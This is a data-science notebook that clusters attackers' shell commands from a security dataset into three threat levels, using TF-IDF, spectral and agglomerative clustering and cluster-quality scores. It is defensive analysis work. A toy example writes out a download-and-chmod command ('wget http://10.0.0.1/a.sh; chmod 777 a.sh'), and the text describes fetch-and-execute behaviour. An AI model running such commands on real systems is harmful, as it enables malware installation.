# First Clustering Stage
This notebook contains the code for the first stage of data clustering. We use Spectral Clustering and Agglomerative Clustering to label our data based on the commands issued by the cyberattacker. The Davies-Bouldin index and the Calinski-Harabasz score are used for model selection.

In [None]:
# Required imports 

# Utils functions
from utils import *

# Ignore warnings
import warnings
warnings.filterwarnings('ignore')

# General imports 
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from collections import Counter
import seaborn as sns
from prettytable import PrettyTable

# ML imports
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity
from sklearn.cluster import SpectralClustering
from sklearn.cluster import AgglomerativeClustering
from sklearn.metrics import calinski_harabasz_score
from sklearn.metrics import davies_bouldin_score

# Dimensionality reduction
import umap
import plotly.express as px

## Spectral Clustering

Clustering from a similarity matrix. 

### Similarity matrix
We compute the cosine similarity matrix from a tf-idf vectorization of the unique commands.

In [None]:
# Read csv file
df = pd.read_csv("../Data/Cluster_data.csv")
# Just take the commands feature
df_commands = df[['_source.commands']]
# Unique commands
print('Number of unique commands in the dataset:', df_commands['_source.commands'].nunique())

Since we have too many unique commands, let us apply a "command normalization" to reduce the dimensionality.

In [None]:
# Command normalization
df_commands = command_normalization(df_commands)
print('Number of unique commands in the processed dataset:', df_commands['_source.commands'].nunique())
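The `command_normalization` helper comes from `utils` and is not shown in this notebook. Purely as an illustration of the idea, the sketch below assumes that normalization means replacing volatile tokens (URLs, IP addresses, numbers) with placeholders. The patterns, the placeholder names and the `normalize_command` function are hypothetical and may differ from the actual helper.

```python
import re

# Hypothetical rules; the real ones live in utils.command_normalization
PATTERNS = [
    (re.compile(r"https?://\S+"), "<URL>"),
    (re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b"), "<IP>"),
    (re.compile(r"\b\d+\b"), "<NUM>"),
]

def normalize_command(command: str) -> str:
    """Replace volatile tokens with placeholders and collapse whitespace."""
    for pattern, placeholder in PATTERNS:
        command = pattern.sub(placeholder, command)
    return " ".join(command.split())

toy_commands = [
    "wget http://10.0.0.1/a.sh; chmod 777 a.sh",
    "wget http://10.0.0.2/b.sh;  chmod 777 a.sh",
    "uname -a",
]
toy_normalized = [normalize_command(c) for c in toy_commands]

# Commands that differ only in volatile tokens collapse into one
print(len(set(toy_commands)), "->", len(set(toy_normalized)))  # 3 -> 2
```

Fewer unique strings means a smaller similarity matrix, which matters because that matrix grows quadratically with the number of unique commands.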

On the full dataset, normalization reduces the number of unique commands from 158436 to 3299. Let us proceed with the tf-idf vectorizer and the cosine similarity matrix.

In [None]:
# Identify the unique commands
unique_commands = df_commands['_source.commands'].unique()

# Create a TF-IDF vectorizer and compute the TF-IDF matrix for the unique commands
tfidf_vectorizer = TfidfVectorizer()
tfidf_matrix = tfidf_vectorizer.fit_transform(unique_commands)
print('Tf-idf vectorization done!')

# Compute the cosine similarity between the unique commands
cosine_sim_matrix = cosine_similarity(tfidf_matrix,tfidf_matrix,dense_output=True)
print('Similarity matrix computed!') 
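To get a feel for what the similarity matrix contains, here is a small sketch on three made-up command strings (the toy strings and the `toy_*` names are assumptions, not data from the notebook). With the default settings, `TfidfVectorizer` L2-normalizes each row, so the cosine similarity reduces to a plain dot product and all entries lie between 0 and 1.

```python
import numpy as np
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity

# Made-up commands: the first two share tokens, the third shares none
toy_commands = [
    "wget payload chmod payload",
    "wget payload",
    "uname cat cpuinfo",
]
toy_tfidf = TfidfVectorizer().fit_transform(toy_commands)
toy_sim = cosine_similarity(toy_tfidf)

# Rows are unit vectors, so the dot product gives the same matrix
toy_dot = (toy_tfidf @ toy_tfidf.T).toarray()

print(np.round(toy_sim, 3))
print("Same as dot product:", np.allclose(toy_sim, toy_dot))
```

Commands with no token in common get similarity 0, so they contribute no edge weight in the graph that Spectral Clustering works on.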

### Random walk normalized Laplacian. Optimal number of clusters
This matrix will help us choose the optimal number of clusters for the Spectral Clustering algorithm.

In [None]:
# Compute Laplacian
L_rw = compute_Lrw(cosine_sim_matrix)

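# Calculate the eigenvalues of L_rw. The matrix is not symmetric, so eigvals
# may return complex values with tiny imaginary parts; keep the real part
eigenvalues = np.real(np.linalg.eigvals(L_rw))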

# Sort the eigenvalues in ascending order
sorted_eigenvalues = np.sort(eigenvalues)[:20]

# Plot the first 20 eigenvalues
plt.figure(figsize=(10, 6))
plt.plot(sorted_eigenvalues, marker='o', linestyle='')
plt.xlabel("Eigenvalue Index")
plt.ylabel("Eigenvalues")
plt.grid(True)
plt.show()

Eigengap heuristic: the first three eigenvalues are approximately 0. Then there is a gap between the 3rd and 4th eigenvalues, that is, $|\lambda_3 - \lambda_4|$ is relatively large. According to the eigengap heuristic, this gap indicates that the data set contains 3 clusters.
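The eigengap reading can also be automated. The sketch below is a minimal illustration on a toy similarity matrix, not the notebook's data. It assumes that `compute_Lrw` (defined in `utils`, not shown here) follows the standard definition $L_{rw} = I - D^{-1}W$; the functions `random_walk_laplacian` and `eigengap_k` are hypothetical names introduced for this example.

```python
import numpy as np

def random_walk_laplacian(similarity: np.ndarray) -> np.ndarray:
    """L_rw = I - D^{-1} W, with D the diagonal degree matrix of W."""
    degrees = similarity.sum(axis=1)
    return np.eye(similarity.shape[0]) - similarity / degrees[:, None]

def eigengap_k(similarity: np.ndarray, max_k: int = 10) -> int:
    """Return the k maximizing lambda_{k+1} - lambda_k (eigenvalues sorted ascending)."""
    laplacian = random_walk_laplacian(similarity)
    eigenvalues = np.sort(np.real(np.linalg.eigvals(laplacian)))
    gaps = np.diff(eigenvalues[: max_k + 1])
    return int(np.argmax(gaps)) + 1

# Toy similarity matrix: three tight groups with weak links between them
sizes = [5, 4, 6]
n = sum(sizes)
W = np.full((n, n), 0.01)
start = 0
for size in sizes:
    W[start:start + size, start:start + size] = 0.9
    start += size
np.fill_diagonal(W, 1.0)

print("Suggested number of clusters:", eigengap_k(W))
```

On real data the largest gap is not always the most meaningful one, so it is still worth looking at the eigenvalue plot rather than relying on the argmax alone.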

### Model

In [None]:
# Spectral clustering algorithm
spectral_clustering = SpectralClustering(n_clusters=3, affinity='precomputed', random_state=42)
spectral_labels = spectral_clustering.fit_predict(cosine_sim_matrix)

### Clustering visualization

In [None]:
# Map the computed clusters to the whole dataframe

# Create an empty dictionary for mapping
commands_to_cluster = {}

# Iterate through commands and cluster labels to create the mapping
for command, cluster in zip(unique_commands, spectral_labels):
    commands_to_cluster[command] = cluster

# Mapping commands to each cluster
def map_commands_to_cluster(command):
    return commands_to_cluster.get(command, None)

df['spectral_cluster'] = df_commands['_source.commands'].apply(map_commands_to_cluster)
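The clustering is fitted on unique commands only, so each label has to be propagated back to every row that contains that command. A toy sketch of this step (the data frame, the labels and the `toy_*` names are made up for illustration) shows why the cluster distribution over unique commands can differ from the distribution over the whole dataset:

```python
import pandas as pd

# Toy data: four rows but only two distinct normalized commands
toy_df = pd.DataFrame(
    {"_source.commands": ["uname -a", "wget <URL>", "uname -a", "uname -a"]}
)
toy_unique = toy_df["_source.commands"].unique()
toy_labels = [0, 2]  # hypothetical cluster labels, one per unique command

# Same mapping idea as above, written with dict(zip(...)) and Series.map
toy_mapping = dict(zip(toy_unique, toy_labels))
toy_df["cluster"] = toy_df["_source.commands"].map(toy_mapping)

print(toy_df["cluster"].tolist())  # [0, 2, 0, 0]
```

Here each cluster holds one unique command, yet cluster 0 covers three of the four rows because its command is repeated.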

In [None]:
# Clustering distribution for unique commands
label_counts = Counter(spectral_labels)
labels, counts = zip(*label_counts.items())

# Increment each label by 1
modified_labels = [label + 1 for label in labels]

# Create a figure and axes for the bar chart
fig, ax = plt.subplots(figsize=(8, 5))

# Customize the bar chart appearance
ax.bar(modified_labels, counts, color='skyblue', edgecolor='navy', alpha=0.7)
ax.set_xlabel('Cluster', fontsize=10)
ax.set_ylabel('Count', fontsize=10)

# Add grid lines for better readability
ax.grid(axis='y', linestyle='--', alpha=0.6)

# Set the x-ticks to show 1, 2, and 3
ax.set_xticks([1, 2, 3])
# Show the plot
plt.tight_layout()
plt.show()


In [None]:
# Clustering distribution for the whole dataset
label_counts = Counter(df['spectral_cluster'])
labels, counts = zip(*label_counts.items())

# Increment each label by 1
modified_labels = [label + 1 for label in labels]

# Create a figure and axes for the bar chart
fig, ax = plt.subplots(figsize=(8, 5))

# Customize the bar chart appearance
ax.bar(modified_labels, counts, color='skyblue', edgecolor='navy', alpha=0.7)
ax.set_xlabel('Cluster', fontsize=10)
ax.set_ylabel('Count', fontsize=10)

# Show the y-axis in millions (a formatter keeps labels in sync with the ticks)
ax.yaxis.set_major_formatter(lambda y, _: '{:.0f}M'.format(y / 1e6))

# Add grid lines for better readability
ax.grid(axis='y', linestyle='--', alpha=0.6)


# Set the x-ticks to show only 1, 2, and 3
ax.set_xticks([1, 2, 3])

# Show the plot
plt.tight_layout()
plt.show()


In [None]:
# UMAP embedding
reducer = umap.UMAP(metric='cosine', random_state=42)
embedding = reducer.fit_transform(tfidf_matrix)

# Create a scatter plot with better aesthetics
plt.figure(figsize=(8, 6))
scatter = plt.scatter(embedding[:, 0], embedding[:, 1], c=spectral_labels, cmap='viridis', s=35, edgecolors='w', linewidth=0.5, alpha=0.7)

# Add axis labels
plt.xlabel('UMAP Dimension 1', fontsize=10)
plt.ylabel('UMAP Dimension 2', fontsize=10)

# Customize the grid and ticks
plt.grid(False)
plt.xticks([])
plt.yticks([])

plt.show()


In [None]:
# 3D scatterplot
reducer = umap.UMAP(metric='cosine',n_components=3, random_state = 42) 
embedding = reducer.fit_transform(tfidf_matrix) 
fig = px.scatter_3d(
    embedding, x=0, y=1, z=2, color=spectral_labels, size=0.1*np.ones(len(unique_commands)), opacity = 1,
    title='UMAP plot in 3D',
    labels={'0': 'comp. 1', '1': 'comp. 2', '2': 'comp. 3'},
    width=750, height=600,
    color_continuous_scale = 'Viridis'
)
fig.show()

Show the clusters:

In [None]:
# Create one list per cluster
cluster_0 = []  
cluster_1 = []  
cluster_2 = []  

for key, value in commands_to_cluster.items():
    if value == 0:
        cluster_0.append(key)
    elif value == 1:
        cluster_1.append(key)
    else:
        cluster_2.append(key)

In [None]:
cluster_0

In [None]:
cluster_1

In [None]:
cluster_2

**Conclusion:** Spectral clustering gives us a classification by threat level.
+ Cluster 0: Commands such as uname, echo -e, etc., which display system information. They generally remove and create files. Scanning cluster.
+ Cluster 1: Commands to start a terminal session, move and create files and sometimes download suspicious files to the system.
+ Cluster 2: Commands to download files and, in most cases, change their permissions and execute them (wget and chmod).

These clusters track the threat level as attackers infiltrate the targeted system. Cluster 0, categorized as level 1, poses the lowest threat, primarily performing system scans and extracting information. Cluster 1, designated as level 2, not only displays system information but may occasionally attempt to download files. Lastly, cluster 2, which corresponds to level 3, represents the highest threat level, consistently attempting to download and execute external files that may contain malicious software.

## Agglomerative Clustering
Clustering from a similarity matrix. By the previous reasoning, 3 clusters seem a good choice. Let us test it with another clustering algorithm.

Agglomerative Clustering does not directly accept a similarity matrix as input, but we can use a distance (dissimilarity) matrix instead.

In [None]:
# Agglomerative clustering with similarity matrix

# Compute distance matrix
distance_matrix = 1-cosine_sim_matrix

# Create an AgglomerativeClustering model with three clusters(as before)
agg_clustering = AgglomerativeClustering(n_clusters=3, linkage='complete', metric='precomputed')

# Fit the model on the distance matrix (labels are stored in agg_clustering.labels_)
agg_clustering.fit(distance_matrix)
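The conversion `1 - cosine_sim_matrix` used above can leave tiny negative entries or a diagonal that is not exactly zero because of floating-point rounding. The sketch below shows one possible way to sanitize the result before passing it as a precomputed distance matrix; `similarity_to_distance` is a hypothetical helper and the toy matrix is made up.

```python
import numpy as np

def similarity_to_distance(similarity: np.ndarray) -> np.ndarray:
    """Turn a cosine similarity matrix into a clean precomputed distance matrix."""
    distance = 1.0 - similarity
    # Rounding errors can produce tiny negative values such as -2e-16
    distance = np.clip(distance, 0.0, None)
    # Enforce exact symmetry and a zero diagonal
    distance = (distance + distance.T) / 2.0
    np.fill_diagonal(distance, 0.0)
    return distance

# Toy similarity matrix with a slightly off diagonal, as rounding can produce
toy_similarity = np.array([
    [1.0000000000000002, 0.8, 0.1],
    [0.8, 1.0, 0.2],
    [0.1, 0.2, 0.9999999999999999],
])
toy_distance = similarity_to_distance(toy_similarity)
print(toy_distance)
```

For well-behaved input the cleaned matrix is numerically identical to `1 - similarity`, so this step is a safeguard rather than a change to the method.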

### Clustering visualization

In [None]:
# Clustering distribution for unique commands
label_counts = Counter(agg_clustering.labels_)
labels, counts = zip(*label_counts.items())

# Increment each label by 1
modified_labels = [label + 1 for label in labels]

# Create a figure and axes for the bar chart
fig, ax = plt.subplots(figsize=(8, 5))

# Customize the bar chart appearance
ax.bar(modified_labels, counts, color='skyblue', edgecolor='navy', alpha=0.7)
ax.set_xlabel('Cluster', fontsize=10)
ax.set_ylabel('Count', fontsize=10)

# Add grid lines for better readability
ax.grid(axis='y', linestyle='--', alpha=0.6)


# Set the x-ticks to show only 1, 2, and 3
ax.set_xticks([1, 2, 3])

# Show the plot
plt.tight_layout()
plt.show()

In [None]:
# UMAP embedding
reducer = umap.UMAP(metric='cosine', random_state=42)
embedding = reducer.fit_transform(tfidf_matrix)

# Create a scatter plot with better aesthetics
plt.figure(figsize=(8, 6))
scatter = plt.scatter(embedding[:, 0], embedding[:, 1], c=agg_clustering.labels_, cmap='viridis', s=35, edgecolors='w', linewidth=0.5, alpha=0.7)

# Add axis labels
plt.xlabel('UMAP Dimension 1', fontsize=10)
plt.ylabel('UMAP Dimension 2', fontsize=10)

# Customize the grid and ticks
plt.grid(False)
plt.xticks([])
plt.yticks([])

plt.show()


In [None]:
# 3D scatterplot
reducer = umap.UMAP(metric='cosine',n_components=3, random_state = 42) 
embedding = reducer.fit_transform(tfidf_matrix) 
fig = px.scatter_3d(
    embedding, x=0, y=1, z=2, color=agg_clustering.labels_, size=0.1*np.ones(len(unique_commands)), opacity = 1,
    title='UMAP plot in 3D',
    labels={'0': 'comp. 1', '1': 'comp. 2', '2': 'comp. 3'},
    width=650, height=500,
    color_continuous_scale = 'Viridis'
)
fig.show()

The visualization alone suggests that this model is less consistent than the previous one.

## Model selection
We use the Davies-Bouldin index and the Calinski-Harabasz index for model selection.

In [None]:
# Dense tf-idf features, computed once and reused by both metrics
X_dense = tfidf_matrix.toarray()

# Calinski-Harabasz index
spectral_ch = calinski_harabasz_score(X_dense, spectral_labels)
agg_ch = calinski_harabasz_score(X_dense, agg_clustering.labels_)

# Davies-Bouldin index
spectral_db = davies_bouldin_score(X_dense, spectral_labels)
agg_db = davies_bouldin_score(X_dense, agg_clustering.labels_)

# Create a table
table = PrettyTable()
table.field_names = ["Metric", "Spectral Clustering", "Agglomerative Clustering"]

# Add your metrics to the table
table.add_row(["Calinski-Harabasz Score", spectral_ch, agg_ch])
table.add_row(["Davies-Bouldin Index", spectral_db, agg_db])

# Print the table
print(table)

Spectral clustering shows better results, so its labels are the ones saved with the dataset.
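When reading the table, keep in mind that the two metrics point in opposite directions: a higher Calinski-Harabasz score is better, while a lower Davies-Bouldin index is better. The sketch below illustrates this on synthetic data that is unrelated to the notebook's dataset; the blobs and both labelings are made up.

```python
import numpy as np
from sklearn.metrics import calinski_harabasz_score, davies_bouldin_score

rng = np.random.default_rng(42)

# Two well-separated Gaussian blobs in 2D
X_toy = np.vstack([
    rng.normal(loc=0.0, scale=0.5, size=(50, 2)),
    rng.normal(loc=5.0, scale=0.5, size=(50, 2)),
])
good_labels = np.array([0] * 50 + [1] * 50)  # follows the true blobs
bad_labels = np.arange(100) % 2              # alternates labels arbitrarily

ch_good = calinski_harabasz_score(X_toy, good_labels)
ch_bad = calinski_harabasz_score(X_toy, bad_labels)
db_good = davies_bouldin_score(X_toy, good_labels)
db_bad = davies_bouldin_score(X_toy, bad_labels)

print(f"Calinski-Harabasz: good={ch_good:.1f}, bad={ch_bad:.3f}")
print(f"Davies-Bouldin:    good={db_good:.3f}, bad={db_bad:.1f}")
```

Both scores are computed in the Euclidean feature space, which is why the notebook evaluates them on the dense tf-idf vectors rather than on the similarity matrix.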

In [None]:
# Save dataframe with labels
df.to_csv("../Data/Cluster_data_wlabels.csv",index=False)